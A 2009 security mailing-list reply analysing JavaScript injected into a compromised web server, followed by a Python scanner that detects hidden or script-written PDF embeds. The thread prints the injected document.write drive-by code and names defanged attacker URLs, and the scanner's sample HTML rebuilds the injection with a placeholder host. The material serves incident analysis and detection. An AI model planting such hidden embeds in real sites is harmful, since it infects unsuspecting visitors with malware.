Malicious code just found on web server
- Subject: Malicious code just found on web server
- From: fergdawgster at gmail.com (Paul Ferguson)
- Date: Fri, 17 Apr 2009 18:06:57 -0700
- In-reply-to: <[email protected]>
- References: <B4C14CA371FEA842A548BAAB8E49CA6201758B5C16BF@badlands.win.internal> <[email protected]> <[email protected]>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com> wrote:
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("<embed
>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>> Unknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\"></embed>");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> <embed src="include/two.pdf" width="1" height="0"
>> style="border:none"></embed>
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>
Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:
hxxp:// test1.ru /1.1.1/load.php
If that host is not in your block list, it should be -- known purveyor of
crimeware.
This is in addition to the other malicious URLs mentioned in this thread.
- - ferg
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
mxM8Ci/feKnJe6M6qbiESPw=
=b0Yj
-----END PGP SIGNATURE-----
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
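The injection described in this thread has a recognisable shape: a script-written <embed> pointing at an off-site PDF with zero dimensions, plus a static 1x0 PDF embed. The following Python scanner is an added example, not code from the thread or from any of its authors; it flags both forms in a page. The sample HTML is constructed to mirror the quoted snippet, with the documentation-range address 203.0.113.10 and the site name example.invalid standing in for the real hosts, and the visitor-IP field kept as the 1.2.3.4 placeholder the poster used.

```python
import re
from html import unescape
from urllib.parse import urlparse

# Constructed sample page (not the file from the thread). 203.0.113.10 is a
# documentation-range placeholder for the attacker host; example.invalid
# stands in for the compromised site's own domain; 1.2.3.4 is the visitor IP
# placeholder used in the original post.
SAMPLE_HTML = r'''
<html><body>
<script>
document.write("<embed src=\"http://203.0.113.10/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="/media/brochure.pdf" width="600" height="400" type="application/pdf"></embed>
</body></html>
'''

# document.write("...") with JavaScript string escapes such as \" inside
DOC_WRITE_RE = re.compile(r'document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.S)
EMBED_RE = re.compile(r'<embed\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def unescape_js_string(s):
    # Undo the backslash escaping used inside the document.write string literal
    return re.sub(r'\\(.)', r'\1', s)


def parse_attrs(attr_text):
    # Return a lowercase-keyed dict of the tag's name="value" attributes
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = unescape(value)
    return attrs


def dimension(attrs, name):
    # Leading integer of width/height, or None when absent or non-numeric
    m = re.match(r'\d+', attrs.get(name, "").strip())
    return int(m.group(0)) if m else None


def is_hidden(attrs):
    # A 0x0, 1x0 or 0x1 embed renders nothing the visitor can see
    w, h = dimension(attrs, "width"), dimension(attrs, "height")
    return (w is not None and w <= 1) or (h is not None and h <= 1)


def scan_embeds(html, site_host):
    """Flag hidden embeds and script-written PDF embeds; site_host is the page's own host."""
    findings = []
    # Scan the static markup with the document.write calls cut out, then scan
    # each decoded document.write payload separately so its origin is recorded
    sources = [("static", DOC_WRITE_RE.sub("", html))]
    sources += [("document.write", unescape_js_string(m.group(1)))
                for m in DOC_WRITE_RE.finditer(html)]
    for origin, text in sources:
        for m in EMBED_RE.finditer(text):
            attrs = parse_attrs(m.group(1))
            src = attrs.get("src", "")
            host = urlparse(src).netloc.lower()
            hidden = is_hidden(attrs)
            pdf = (attrs.get("type", "").lower() == "application/pdf"
                   or src.lower().endswith(".pdf"))
            if not (hidden or (origin == "document.write" and pdf)):
                continue
            reasons = []
            if hidden:
                reasons.append("hidden (<=1px)")
            if pdf:
                reasons.append("pdf")
            if origin == "document.write":
                reasons.append("written by script")
            if host and host != site_host.lower():
                reasons.append("off-site src " + host)
            findings.append({"origin": origin, "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_embeds(SAMPLE_HTML, "example.invalid"):
        print(f["origin"], f["src"], ", ".join(f["reasons"]))
```

Run against the sample, the scanner reports the static 1x0 two.pdf embed and the script-written 0x0 off-site embed, and leaves the visible 600x400 brochure alone. The document.write pass matters because a scanner that only looks at static tags never sees the embed at all, which is exactly why the injected code was written that way.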